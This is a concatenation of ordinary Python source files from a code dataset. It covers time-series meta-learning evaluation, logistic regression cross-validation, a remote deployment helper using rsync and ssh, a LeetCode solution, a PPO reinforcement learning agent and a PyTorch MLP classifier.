train_Y_mse)\n #print(model_ts_mse.coef_)\n #print(model_ts_mse.score(train_X_mse, train_Y_mse))\n \n \n ## Testing of Time-Series Meta-learner \n j = 0\n for test_data_name in test_folds_list_uv[i]: ## Append all of the first window performances \n \n test_X_mse_1 = [];test_X_mse_2 = [];test_X_mse_3 = []; \n test_Y_mse_1 = [];test_Y_mse_2 = [];test_Y_mse_3 = []; ## Actual Performances (Ground Truth)\n \n \n ## Collect Performances for that dataset\n results_vec_mse_1, results_vec_mape_1, results_vec_smape_1, arr_models = Get_All_Model_Dataset(test_data_name, uv_dir_1, 'Uni-var')\n results_vec_mse_2, results_vec_mape_2, results_vec_smape_2, arr_models = Get_All_Model_Dataset(test_data_name, uv_dir_2, 'Uni-var')\n results_vec_mse_3, results_vec_mape_3, results_vec_smape_3, arr_models = Get_All_Model_Dataset(test_data_name, uv_dir_3, 'Uni-var') \n \n \n ## First Window History features and performances\n test_X_mse_1.extend(meta_features_test.iloc[j,:])\n test_X_mse_1.extend([0] * 322)\n if PCA_option == 'No':\n test_X_mse_1.extend([0] * meta_features_test_orig_2.shape[1])\n else:\n test_X_mse_1.extend([0] * n_components)\n \n test_X_mse_1.extend([0] * 322)\n \n a_series = pd.Series(test_X_mse_1)\n test_X_mse = test_X_mse.append(a_series, ignore_index=True)\n \n ## Ground Truth of the first window\n test_Y_mse_1.extend(results_vec_mse_1)\n a_series = pd.Series(test_Y_mse_1)\n test_Y_mse = test_Y_mse.append(a_series, ignore_index=True)\n \n ## Predict the First window performances\n #print(test_X_mse_1)\n #test_X_mse_1 = np.array(test_X_mse_1)\n #test_X_mse_1 = np.reshape(test_X_mse_1, (test_X_mse_1.shape[0], test_X_mse_1.shape[1], 1))\n \n #predicted_win_1 = model_ts_mse.predict([test_X_mse_1])\n\n #a_series = pd.Series(predicted_win_1[0])\n #predicted_mse = predicted_mse.append(a_series, ignore_index=True)\n \n ## Second Window History features and performances\n test_X_mse_2.extend(meta_features_test.iloc[j,:])\n #test_X_mse_2.extend(predicted_win_1[0])\n test_X_mse_2.extend(results_vec_mse_1)\n if PCA_option == 'No':\n test_X_mse_2.extend([0] * meta_features_test_orig_2.shape[1])\n else:\n test_X_mse_2.extend([0] * n_components)\n test_X_mse_2.extend([0] * 322) \n \n ## Append to test_X dataframe\n a_series = pd.Series(test_X_mse_2)\n test_X_mse = test_X_mse.append(a_series, ignore_index=True)\n \n\n test_Y_mse_2.extend(results_vec_mse_2)\n \n a_series = pd.Series(test_Y_mse_2)\n test_Y_mse = test_Y_mse.append(a_series, ignore_index=True)\n \n ## Predict the second window performances\n print(test_X_mse_2)\n #test_X_mse_2 = np.array(test_X_mse_2)\n #test_X_mse_2 = np.reshape(test_X_mse_2, (test_X_mse_2.shape[0], test_X_mse_2.shape[1], 1)) \n \n #predicted_win_2 = model_ts_mse.predict([test_X_mse_2])\n #a_series = pd.Series(predicted_win_2[0])\n #predicted_mse = predicted_mse.append(a_series, ignore_index=True)\n \n \n ## Third Window History features and performances\n test_X_mse_3.extend(meta_features_test.iloc[j,:])\n #test_X_mse_3.extend(predicted_win_1[0]) Predict everything from scratch\n test_X_mse_3.extend(results_vec_mse_1)\n test_X_mse_3.extend(meta_features_test.iloc[j+len(test_folds_list_uv[i]),:])\n test_X_mse_3.extend(results_vec_mse_2)\n #test_X_mse_3.extend(predicted_win_2[0])\n \n ## Appending the third raw to the test_X dataframe \n a_series = pd.Series(test_X_mse_3)\n test_X_mse = test_X_mse.append(a_series, ignore_index=True)\n print(test_X_mse)\n \n \n ## Predicting Third window performances using time-series regression model\n #test_X_mse_3 = np.array(test_X_mse_3)\n #test_X_mse_3 = np.reshape(test_X_mse_3, (test_X_mse_3.shape[0], test_X_mse_3.shape[1], 1))\n \n #predicted_win_3 = model_ts_mse.predict([test_X_mse_3])\n #a_series = pd.Series(predicted_win_3[0])\n #predicted_mse = predicted_mse.append(a_series, ignore_index=True)\n \n \n \n ## Appending the third raw to the test_Y dataframe \n test_Y_mse_3.extend(results_vec_mse_3)\n \n a_series = pd.Series(test_Y_mse_3)\n test_Y_mse = test_Y_mse.append(a_series, ignore_index=True)\n print(test_Y_mse)\n \n #print('Test Features')\n #print(test_X_mse)\n \n test_X_mse = np.array(test_X_mse)\n test_X_mse = np.reshape(test_X_mse, (test_X_mse.shape[0], test_X_mse.shape[1], 1))\n \n ## Start Time for Inference\n start_time = time.time()\n \n predicted_win = model_ts_mse.predict(test_X_mse)\n print(predicted_win)\n print(predicted_win.shape)\n print(predicted_win[0])\n a_series = pd.Series(predicted_win[0])\n predicted_mse = predicted_mse.append(a_series, ignore_index=True)\n print(predicted_mse)\n \n \n \n ## Get the best model index from Autoforecast time-series meta-learner \n predicted_mse['MinColumnID']= predicted_mse.idxmin(axis=1)\n test_Y_mse['MinColumnID']= test_Y_mse.idxmin(axis=1)\n \n \n \n print('Predicted ........')\n print(predicted_mse)\n #predicted_mse.to_csv('Predicted_MSE_Fold_No_' + str(i) + '.csv') \n \n print('Actual..........')\n print(test_Y_mse)\n #test_Y_mse.to_csv('Actual_MSE_Fold_No_' + str(i) + '.csv') \n\n \n ## Inference by getting the actual performance of the chosen model index by the time-series regression (i.e., the one with the least predicted output) \n K = 1\n a_vec = []\n cnt = 0\n for j in range(0, len(test_Y_mse)):\n res = sorted(range(len(test_Y_mse.iloc[j,:-1])), key = lambda sub: test_Y_mse.iloc[j,:-1][sub])[:K]\n #print(test_Y_mse.iloc[j,-1])\n print(res)\n print(np.argmin(predicted_win[j]))\n if np.argmin(predicted_win[j]) in res: #np.argmin(predicted_win[j]):\n cnt += 1\n #print(cnt)\n final_vec_all_folds.append(test_Y_mse.iloc[j,np.argmin(predicted_win[j])]) #predicted_mse.iloc[j,-1]])\n print(cnt)\n \n print('Fold No. ' + str(i))\n \n cnt_k_all += cnt\n print('Count-k: ' + str(cnt_k_all))\n print('Rank-k-Acc: ' + str((cnt_k_all / (len(test_Y_mse) * n_folds))))\n \n #break \n #print(final_vec_all_folds) \n \n ## Estimate Inference Time\n #AF_best_inference_run_time_seconds = time.time() - start_time \n #print('AutoForecast Inference Time: '+ str(AF_best_inference_run_time_seconds))\n \n \n #print('Performance Vector after all folds for time-series regression')\n \n print(final_vec_all_folds)\n print(Average_val(final_vec_all_folds)) \n \n \n ''' \n # (A) Define general meta-learning model\n \n #print(train_folds_list_uv[i]) \n \n \n \n train_X = meta_features_train\n train_Y_mse = []; train_Y_mape = []; train_Y_smape = []\n\n #df_meta_feat = df_meta_feat.fillna(0)\n \n ## Get the output vector for each dataset in that fold \n for train_data_name in train_folds_list_uv[i]: ## Append all of the first window performances \n results_vec_mse_1, results_vec_mape_1, results_vec_smape_1, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_1, 'Uni-var')\n train_Y_mse.append(results_vec_mse_1); train_Y_mape.append(results_vec_mape_1); train_Y_smape.append(results_vec_smape_1)\n \n for train_data_name in train_folds_list_uv[i]: ## Append all of the second window performances \n results_vec_mse_2, results_vec_mape_2, results_vec_smape_2, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_2, 'Uni-var')\n train_Y_mse.append(results_vec_mse_2); train_Y_mape.append(results_vec_mape_2); train_Y_smape.append(results_vec_smape_2)\n \n for train_data_name in train_folds_list_uv[i]: ## Append all of the third window performances \n results_vec_mse_3, results_vec_mape_3, results_vec_smape_3, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_3, 'Uni-var')\n train_Y_mse.append(results_vec_mse_3); train_Y_mape.append(results_vec_mape_3); train_Y_smape.append(results_vec_smape_3)\n \n ## Repeating the performance matrix to the multiple time windows\n #train_Y_mse = np.repeat(train_Y_mse, 3, axis=0)\n #train_Y_mape = np.repeat(train_Y_mape, 3, axis=0)\n #train_Y_smape = np.repeat(train_Y_smape, 3, axis=0)\n \n print (np.array(train_Y_mape).shape)\n \n \n # Fit Model for MSE Performance Metric \n model_mse = LinearRegression()\n model_mse.fit(train_X, train_Y_mse)\n print(model_mse.coef_)\n print(model_mse.score(train_X, train_Y_mse))\n \n \n # Fit Model for MAPE Performance Metric \n train_Y_mape = np.array(train_Y_mape)\n train_Y_mape[np.isinf(train_Y_mape)] = 100 ## Replacing infinity values with high number\n train_Y_mape[np.isnan(train_Y_mape)] = 100 ## Replacing NAN values with high number \n\n model_mape = LinearRegression()\n model_mape.fit(train_X, train_Y_mape)\n print(model_mape.coef_)\n print(model_mape.score(train_X, train_Y_mape))\n \n # Fit Model for sMAPE Performance Metric \n train_Y_smape = np.array(train_Y_smape)\n train_Y_smape[np.isinf(train_Y_smape)] = 100 ## Replacing infinity values with high number\n train_Y_smape[np.isnan(train_Y_smape)] = 100 ## Replacing NAN values with high number\n \n model_smape = LinearRegression()\n model_smape.fit(train_X, train_Y_smape)\n print(model_smape.coef_)\n print(model_smape.score(train_X, train_Y_smape))\n \n # Make a Prediction\n test_X = meta_features_test\n yhat_mse = model_mse.predict(test_X)\n yhat_mape = model_mape.predict(test_X) \n yhat_smape = model_smape.predict(test_X)\n \n # summarize prediction\n print(yhat_mse[0])\n print(yhat_mse)\n print(np.array(yhat_mse).shape)\n \n for test_idx in range(len(test_folds_list_uv[i])):\n \n ## Get the best model index from original data\n results_vec_mse, results_vec_mape, results_vec_smape, arr_models = Get_All_Model_Dataset(test_folds_list_uv[i][test_idx], uv_dir, 'Uni-var') \n \n best_model_dataset_index_mse_orig = results_vec_mse.index(min(results_vec_mse))\n best_model_dataset_index_mape_orig = results_vec_mape.index(min(results_vec_mape))\n best_model_dataset_index_smape_orig = results_vec_smape.index(min(results_vec_smape))\n \n \n ## Get the best model index from Autoforecast general meta-learner \n minimum_mse = np.min(yhat_mse[test_idx])\n best_model_dataset_index_mse = np.where(yhat_mse[test_idx] == minimum_mse)\n print('Autoforecast: ' + arr_models[best_model_dataset_index_mse[0][0]] + '(' + str(results_vec_mse[best_model_dataset_index_mse[0][0]]) + ')' + ' orig: ' + arr_models[best_model_dataset_index_mse_orig] + '(' + str(results_vec_mse[best_model_dataset_index_mse_orig]) + ')' )\n \n minimum_mape = np.min(yhat_mape[test_idx])\n best_model_dataset_index_mape = np.where(yhat_mape[test_idx] == minimum_mape)\n \n minimum_smape = np.min(yhat_smape[test_idx])\n best_model_dataset_index_smape = np.where(yhat_smape[test_idx] == minimum_smape)\n \n \n \n print('Fold Finished ............') \n \n #break\n '''\n\n \n\n\n\n","sub_path":"src/Meta-Learner/Autoforecast_Train_timeseries_RNN.py","file_name":"Autoforecast_Train_timeseries_RNN.py","file_ext":"py","file_size_in_byte":35271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440379418","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\nfeature_selected = ['Danceability', \r\n 'Energy', \r\n 'Speechiness', \r\n 'Acousticness', \r\n 'Instrumentalness', \r\n 'Liveness',\r\n 'Valence',\r\n 'Loudness',\r\n 'Tempo',\r\n 'Artist_Score']\r\n\r\nData = pd.read_excel('E:/Desktop/Data/feature_complete_normalized_1990_2019.xlsx')\r\nkf = KFold(n_splits=10, shuffle=True)\r\nkf.get_n_splits(Data)\r\n\r\nstore_train = []\r\nstore_test =[]\r\nstore_train_p = []\r\nstore_test_p =[]\r\nstore_train_r = []\r\nstore_test_r =[]\r\nfor train_index, test_index in kf.split(Data):\r\n train_set = Data.loc[train_index,]\r\n Xtrain = np.array(train_set[feature_selected])\r\n Ytrain = np.array(train_set['label'], dtype=float)\r\n test_set = Data.loc[test_index,]\r\n Xtest = np.array(test_set[feature_selected])\r\n Ytest = np.array(test_set['label'], dtype=float)\r\n #Unpenalized Logistic Regression \r\n clf = LogisticRegression(solver='lbfgs', C=np.inf) \r\n clf.fit(Xtrain, Ytrain)\r\n train_predict = clf.predict(Xtrain)\r\n train_accuracy = (train_predict==Ytrain).mean()\r\n test_predict = clf.predict(Xtest)\r\n test_accuracy = (test_predict==Ytest).mean()\r\n store_train.append(train_accuracy)\r\n store_test.append(test_accuracy)\r\n tp1 = sum(((train_predict == 1) & (Ytrain == 1)) * 1)\r\n fp1 = sum(((train_predict == 0) & (Ytrain == 1)) * 1)\r\n tn1 = sum(((train_predict == 1) & (Ytrain == 0)) * 1)\r\n fn1 = sum(((train_predict == 0) & (Ytrain == 0)) * 1)\r\n train_precision = tp1 / (tp1 + fp1)\r\n train_recall = tp1 / (tp1 + fn1)\r\n store_train_p.append(train_precision)\r\n store_train_r.append(train_recall)\r\n tp2 = sum(((test_predict == 1) & (Ytest == 1)) * 1)\r\n fp2 = sum(((test_predict == 0) & (Ytest == 1)) * 1)\r\n tn2 = sum(((test_predict == 1) & (Ytest == 0)) * 1)\r\n fn2 = sum(((test_predict == 0) & (Ytest == 0)) * 1)\r\n test_precision = tp2 / (tp2 + fp2)\r\n test_recall = tp2 / (tp2 + fn2)\r\n store_test_p.append(test_precision)\r\n store_test_r.append(test_recall)\r\n\r\naverge_train_accuracy = np.mean(store_train)\r\nprint('Train:',averge_train_accuracy)\r\naverge_test_accuracy = np.mean(store_test)\r\nprint('Test:',averge_test_accuracy)\r\naverge_train_precision = np.mean(store_train_p)\r\nprint(\"Train precision:\",averge_train_precision)\r\naverge_test_precision = np.mean(store_test_p)\r\nprint(\"Test precision:\",averge_test_precision)\r\naverge_train_recall = np.mean(store_train_r)\r\nprint(\"Train recall:\",averge_train_recall)\r\naverge_test_recall = np.mean(store_test_r)\r\nprint(\"Test recall:\",averge_test_recall)\r\n\r\n","sub_path":"logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"371307149","text":"from asyncinit import asyncinit\nfrom erund.utils import ssh, cmd, cmdout\nfrom .platform import Platform\nGIT = ['git']\nRSYNC = ['rsync']\n\n\n@asyncinit\nclass Linux(Platform):\n async def __init__(self, id_, hostuser, host, command):\n await super().__init__(id_)\n self.rcwd = f'/home/{hostuser}/{self.id}'\n self.hostuser = hostuser\n self.host = host\n self.command = command\n self.pidfile = f'{self.rcwd}/{self.id}.pid'\n\n async def upload(self):\n rootdir = await cmdout(GIT + ['rev-parse', '--show-toplevel'])\n res = await cmdout(RSYNC + ['-r', '-a', '-e', 'ssh', '--delete', '--exclude', 'build', '--exclude', 'devel', f'{rootdir}/', f'{self.hostuser}@{self.host}:{self.rcwd}/'])\n print(res)\n\n async def stop(self):\n res = await ssh(self.host, self.hostuser, f'if [ -f {self.pidfile} ]; then (pkill -F {self.pidfile} && rm {self.pidfile}); fi', rcwd=self.rcwd)\n print(res)\n return res\n\n async def run(self):\n await self.stop()\n command = self.command\n if isinstance(command, list):\n command = ' '.join(command)\n command = f\"(({command}) & echo $! > {self.pidfile} &)\"\n res = await ssh(self.host, self.hostuser, command, rcwd=self.rcwd)\n print(res)\n return res\n\n","sub_path":"erund/platforms/linux.py","file_name":"linux.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"251621159","text":"# Given a string, find the first non-repeating character in it and return it's index. If it doesn't exist, return -1.\n#\n# Examples:\n#\n# s = \"leetcode\"\n# return 0.\n#\n# s = \"loveleetcode\",\n# return 2.\n# Note: You may assume the string contain only lowercase letters.\n\n\nclass Solution(object):\n def firstUniqChar(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n hmap = {}\n l = set([])\n for i in range(len(s)):\n if s[i] not in hmap:\n hmap[s[i]] = i\n l.add(i)\n elif hmap[s[i]] in l:\n l.remove(hmap[s[i]])\n if not l:\n return -1\n return min(l)\n\n# Note:\n# Keeping track of index of letters when they are first seen, removing them when we see them again\n# Minimum index is the result\n","sub_path":"LeetCode/387-E-FirstUniqueCharacterInAString.py","file_name":"387-E-FirstUniqueCharacterInAString.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"614030158","text":"import numpy as np\n\nimport chainer\nimport chainer.links as L\nimport chainer.functions as F\nimport threading, random\n\nfrom myML.rl.model import PolicyValueModel, DisCreteSoftMaxPolicyValueModel\nfrom myML.rl.learner import AsyncLearner\n\n\nclass PPOLearner(AsyncLearner):\n def __init__(self, model: PolicyValueModel, optimizer: chainer.Optimizer, *, batch_size=32,\n num_train_per_episode=15, eps=0.2):\n super().__init__(model, optimizer, batch_size=batch_size)\n self.old_model = self.copy_model()\n self.num_train_per_episode = num_train_per_episode\n self.eps = eps\n\n def clear_buffer(self):\n self.train_buffer = []\n\n def push_train_buffer(self, state, action, reward):\n self.train_buffer.append((state, action, reward))\n\n def get_data_from_train_buffer(self):\n batch_size = self.batch_size if len(self.train_buffer) > self.batch_size else len(self.train_buffer)\n\n datas_index = random.sample(range(len(self.train_buffer)), batch_size)\n\n # rearange dates\n states = []\n actions = []\n advantages = []\n for index in datas_index:\n state, action, advantage = self.train_buffer[index]\n states.append(state)\n actions.append(action)\n advantages.append(advantage)\n\n states = np.array(states).astype(np.float32)\n actions = np.array(actions).astype(np.int32)\n advantages = np.array(advantages).astype(np.float32)\n return states, actions, advantages\n\n def update_model(self):\n # start minibatch learning\n for t in range(self.num_train_per_episode):\n # get learning data\n with self.lock:\n states, actions, advantages = self.get_data_from_train_buffer()\n # get policy and value\n policies, values = self.model(states)\n old_policies, _ = self.old_model(states)\n\n # calculate loss\n loss_v = F.squared_error(values, np.array(advantages).astype(np.float32))\n loss_ent = -policies.entropy()\n\n r = (policies.get_prob(actions) + 1.0e-10) / (old_policies.get_prob(actions) + 1.0e-10)\n loss_clip = (advantages - values.data) * F.minimum(r, F.clip(r, 1.0 - self.eps, 1.0 + self.eps))\n\n loss = F.mean(-loss_clip + loss_v * 0.2 + 0.01 * loss_ent)\n\n self.model.cleargrads()\n loss.backward()\n self.optimizer.update()\n # update old model\n self.old_model = self.copy_model()\n self.clear_buffer()\n\n\nclass PPO:\n def __init__(self, model: PolicyValueModel, make_env_func=None, *,\n lr=1e-3, batch_size=32, gamma=0.99, lam=0.95, t_max=8, clip_eps=0.2, num_episode=200,\n num_steps_per_episode=200,\n eps_start=0.4, eps_end=0.15, eps_steps=75000, num_train_per_episode=15):\n if make_env_func is None:\n raise Exception(\"set make_env_func:Callable\")\n self.make_env_func = make_env_func\n\n # share learner\n self.learner = PPOLearner(model, chainer.optimizers.RMSprop(lr=lr), batch_size=batch_size,\n num_train_per_episode=num_train_per_episode, eps=clip_eps)\n\n # setting\n self.eps_start = eps_start\n self.eps_end = eps_end\n self.eps_steps = eps_steps\n self.t_max = t_max\n self.gamma = gamma\n self.lam = lam\n self.num_episode = num_episode\n self.num_steps_per_episode = num_steps_per_episode\n\n # flag\n self.on_explore = False\n\n def async_explore(self, learner: PPOLearner, explorer_event: threading.Event, learner_event: threading.Event):\n # make env\n env = self.make_env_func()\n\n # individual model\n model = learner.copy_model()\n # wait updating model\n explorer_event.wait()\n explorer_event.clear()\n while self.on_explore:\n episode_reward = 0.0\n state = env.reset()\n sar_que = []\n for t in range(1, self.num_steps_per_episode):\n eps = max(self.eps_start - (self.eps_start - self.eps_end) * learner.step / self.eps_steps,\n self.eps_end)\n\n action = model.get_eps_greedy_action(state, eps)\n\n next_state, reward, done, _ = env.step(action)\n\n sar_que.append([state, action, reward])\n learner.step += 1\n episode_reward += reward\n\n if t % self.t_max == 0 or done:\n # calculate generalize advantage estimation\n # A_t=sum_{i=0}^{T-t}(gamma*lambda)^i * delta_{t+i}\n # delta_{t}:=gamma * V(s_{t+1}) + r_t - V(s_t)\n # lambda : [0,1]\n # in PPO, lambda=0.95\n\n # here calculate A_t + V(s_t)\n R = 0.0\n if not done:\n R += self.gamma * model.get_value([state]).data[0][0]\n\n for s, a, r in reversed(sar_que):\n R += r\n v = model.get_value([s])\n with learner.lock:\n learner.push_train_buffer(s, a, [R])\n R *= self.gamma * self.lam\n R += self.gamma * (1 - self.lam) * v.data[0][0]\n\n sar_que = []\n\n # start updateding model\n learner_event.set()\n\n # wait updating model\n explorer_event.wait()\n if self.on_explore:\n explorer_event.clear()\n # sync model\n model = learner.copy_model()\n\n if done:\n break\n state = next_state\n\n def start(self, num_explorer: int):\n # event to controll thread\n explorer_event = threading.Event()\n learner_events = [threading.Event() for i in range(num_explorer)]\n\n # evaluate env\n eval_env = self.make_env_func()\n explorers = [threading.Thread(target=self.async_explore, args=(self.learner, explorer_event, learner_events[i]))\n for i in range(num_explorer)]\n\n self.on_explore = True\n for explore in explorers:\n explore.start()\n\n for episode in range(self.num_episode):\n # restart explorer\n explorer_event.set()\n\n # wait explorer process\n for learner_event in learner_events:\n learner_event.wait()\n learner_event.clear()\n # start learner process\n self.learner.update_model()\n\n # evalurate\n model = self.learner.get_model()\n episode_reward = 0.0\n for e in range(2):\n s = eval_env.reset()\n for t in range(200):\n a = model.get_action(s)\n s, r, d, _ = eval_env.step(a)\n episode_reward += r\n if d:\n break\n episode_reward /= 2\n print(\"episode={}:score={}\".format(episode, episode_reward))\n\n self.on_explore = False\n explorer_event.set()\n for explore in explorers:\n explore.join()\n\n\nif __name__ == '__main__':\n import gym\n\n\n class myPVModel(DisCreteSoftMaxPolicyValueModel):\n def __init__(self, num_hidden: int, num_action: int):\n super().__init__(num_hidden, num_action)\n with self.init_scope():\n self.l1 = L.Linear(4, num_hidden)\n self.l2 = L.Linear(num_hidden, num_hidden)\n\n def __call__(self, x):\n x = np.array(x).astype(np.float32)\n h = F.relu(self.l1(x))\n h = F.relu(self.l2(h))\n return super().__call__(h)\n\n\n def make_env():\n return gym.make(\"CartPole-v0\")\n\n\n a = PPO(myPVModel(10, 2), make_env, lr=5e-3)\n a.start(8)\n","sub_path":"myML/rl/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55258882","text":"# import needed libraries\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import WeightedRandomSampler, DataLoader, TensorDataset\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom hyper_params import HyperParams\nfrom tqdm import tqdm\n\n# create params object\nparams = HyperParams()\n# set PyTorch device\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Create Loaders\ndef create_loaders(dataset, num_y, batch_size, balance = True):\n # split the data into train, validation, and test sets\n if num_y == 1:\n x_train, x_test, y_train, y_test = train_test_split(dataset[:,:-num_y], dataset[:,-num_y], test_size=params.test_set_fraction)\n else:\n x_train, x_test, y_train, y_test = train_test_split(dataset[:,:-num_y], dataset[:,-num_y:], test_size=params.test_set_fraction)\n x_train, x_val, y_train, y_val = train_test_split(\n x_train, y_train, test_size=params.validation_set_fraction / (params.validation_set_fraction + params.train_set_fraction))\n \n # convert the NumPy arrays into Pytorch tensors\n x_train = torch.from_numpy(x_train).type(torch.float)\n x_val = torch.from_numpy(x_val).type(torch.float)\n x_test = torch.from_numpy(x_test).type(torch.float)\n y_train = torch.from_numpy(y_train).type(torch.float)\n y_val = torch.from_numpy(y_val).type(torch.float)\n y_test = torch.from_numpy(y_test).type(torch.float)\n \n # Create datasets from the tensors\n train_dataset = TensorDataset(x_train, y_train)\n val_dataset = TensorDataset(x_val, y_val)\n test_dataset = TensorDataset(x_test, y_test)\n \n if balance:\n class_sample_count = np.unique(y_train, return_counts=True)[1]\n weight = 1. / class_sample_count\n samples_weight = weight[y_train.type(torch.int8)]\n\n samples_weight = torch.from_numpy(samples_weight)\n sampler = WeightedRandomSampler(samples_weight, len(samples_weight))\n\n train_loader = DataLoader(train_dataset, batch_size, sampler=sampler)\n else:\n train_loader = DataLoader(train_dataset, batch_size, shuffle=True)\n \n val_loader = DataLoader(val_dataset, batch_size)\n test_loader = DataLoader(test_dataset, batch_size)\n \n return train_loader, val_loader, test_loader\n\n# create MLP model class with 2 hidden layers, relu activation, and sigmoid output activation\nclass MLP(nn.Module):\n def __init__(self, nodes, p, num_in, num_out, multilabel):\n super(MLP, self).__init__()\n self.nodes = nodes\n self.p = p\n self.input_nodes = num_in\n self.output_nodes = num_out\n self.multilabel = multilabel\n if len(self.nodes) == 2:\n self.fc1 = nn.Linear(self.input_nodes, self.nodes[0])\n self.dropout1 = nn.Dropout(p = self.p)\n self.bn1 = nn.BatchNorm1d(self.nodes[0])\n self.fc2 = nn.Linear(self.nodes[0], self.nodes[1])\n self.dropout2 = nn.Dropout(p = self.p)\n self.bn2 = nn.BatchNorm1d(self.nodes[1])\n self.fc3 = nn.Linear(self.nodes[1], self.output_nodes)\n if self.multilabel:\n self.out = nn.Sigmoid()\n elif len(self.nodes) == 4:\n self.fc1 = nn.Linear(self.input_nodes, self.nodes[0])\n self.dropout1 = nn.Dropout(p = self.p)\n self.bn1 = nn.BatchNorm1d(self.nodes[0])\n self.fc2 = nn.Linear(self.nodes[0], self.nodes[1])\n self.dropout2 = nn.Dropout(p = self.p)\n self.bn2 = nn.BatchNorm1d(self.nodes[1])\n self.fc3 = nn.Linear(self.nodes[1], self.nodes[2])\n self.dropout3 = nn.Dropout(p = self.p)\n self.bn3 = nn.BatchNorm1d(self.nodes[2])\n self.fc4 = nn.Linear(self.nodes[2], self.nodes[3])\n self.dropout4 = nn.Dropout(p = self.p)\n self.bn4 = nn.BatchNorm1d(self.nodes[3])\n self.fc5 = nn.Linear(self.nodes[3], self.output_nodes)\n if self.multilabel:\n self.out = nn.Sigmoid()\n elif len(self.nodes) == 6:\n self.fc1 = nn.Linear(self.input_nodes, self.nodes[0])\n self.dropout1 = nn.Dropout(p = self.p)\n self.bn1 = nn.BatchNorm1d(self.nodes[0])\n self.fc2 = nn.Linear(self.nodes[0], self.nodes[1])\n self.dropout2 = nn.Dropout(p = self.p)\n self.bn2 = nn.BatchNorm1d(self.nodes[1])\n self.fc3 = nn.Linear(self.nodes[1], self.nodes[2])\n self.dropout3 = nn.Dropout(p = self.p)\n self.bn3 = nn.BatchNorm1d(self.nodes[2])\n self.fc4 = nn.Linear(self.nodes[2], self.nodes[3])\n self.dropout4 = nn.Dropout(p = self.p)\n self.bn4 = nn.BatchNorm1d(self.nodes[3])\n self.fc5 = nn.Linear(self.nodes[3], self.nodes[4])\n self.dropout5 = nn.Dropout(p = self.p)\n self.bn5 = nn.BatchNorm1d(self.nodes[4])\n self.fc6 = nn.Linear(self.nodes[4], self.nodes[5])\n self.dropout6 = nn.Dropout(p = self.p)\n self.bn6 = nn.BatchNorm1d(self.nodes[5])\n self.fc7 = nn.Linear(self.nodes[5], self.output_nodes)\n if self.multilabel:\n self.out = nn.Sigmoid()\n else:\n raise\n\n def forward(self, x):\n if len(self.nodes) == 2:\n x = self.fc1(x)\n x = self.dropout1(x)\n x = nn.functional.elu(x)\n x = self.bn1(x)\n x = self.fc2(x)\n x = self.dropout2(x)\n x = nn.functional.elu(x)\n x = self.bn2(x)\n x = self.fc3(x)\n if self.multilabel:\n x = self.out(x)\n return x\n elif len(self.nodes) == 4:\n x = self.fc1(x)\n x = self.dropout1(x)\n x = nn.functional.elu(x)\n x = self.bn1(x)\n x = self.fc2(x)\n x = self.dropout2(x)\n x = nn.functional.elu(x)\n x = self.bn2(x)\n x = self.fc3(x)\n x = self.dropout3(x)\n x = nn.functional.elu(x)\n x = self.bn3(x)\n x = self.fc4(x)\n x = self.dropout4(x)\n x = nn.functional.elu(x)\n x = self.bn4(x)\n x = self.fc5(x)\n if self.multilabel:\n x = self.out(x)\n return x\n elif len(self.nodes) == 6:\n x = self.fc1(x)\n x = self.dropout1(x)\n x = nn.functional.elu(x)\n x = self.bn1(x)\n x = self.fc2(x)\n x = self.dropout2(x)\n x = nn.functional.elu(x)\n x = self.bn2(x)\n x = self.fc3(x)\n x = self.dropout3(x)\n x = nn.functional.elu(x)\n x = self.bn3(x)\n x = self.fc4(x)\n x = self.dropout4(x)\n x = nn.functional.elu(x)\n x = self.bn4(x)\n x = self.fc5(x)\n x = self.dropout5(x)\n x = nn.functional.elu(x)\n x = self.bn5(x)\n x = self.fc6(x)\n x = self.dropout6(x)\n x = nn.functional.elu(x)\n x = self.bn6(x)\n x = self.fc7(x)\n if self.multilabel:\n x = self.out(x)\n return x\n else:\n raise\n\ndef plot_loss(n_epochs, train_loss, val_loss, upper_y_lim):\n plt.plot(list(range(1, n_epochs+1)), train_loss, color='blue')\n plt.plot(list(range(1, n_epochs+1)), val_loss, color='orange')\n plt.ylim((0.0, upper_y_lim))\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.title('Training (Blue) and Validation (Orange) Loss')\n plt.show()\n return\n\ndef classify(model, loader, multilabel):\n model.eval()\n y_true = torch.LongTensor()\n y_pred = torch.LongTensor()\n for data in loader:\n x, y = data[0].to(device), data[1].to(device)\n y_hat = model(x)\n if multilabel:\n num_pos_labels = y_hat.shape[1] // 2\n y_hat = torch.max(y_hat[:,-num_pos_labels:], 1).values\n y = torch.max(y[:,-num_pos_labels:], 1).values\n else:\n y_hat = torch.sigmoid(y_hat)\n y_hat = y_hat.view(y_hat.shape[0])\n y_hat = torch.where(y_hat >= 0.5, torch.ones_like(y_hat), torch.zeros_like(y_hat))\n y_true = torch.cat((y_true, y.to('cpu').long()), dim=0)\n y_pred = torch.cat((y_pred, y_hat.to('cpu').long()), 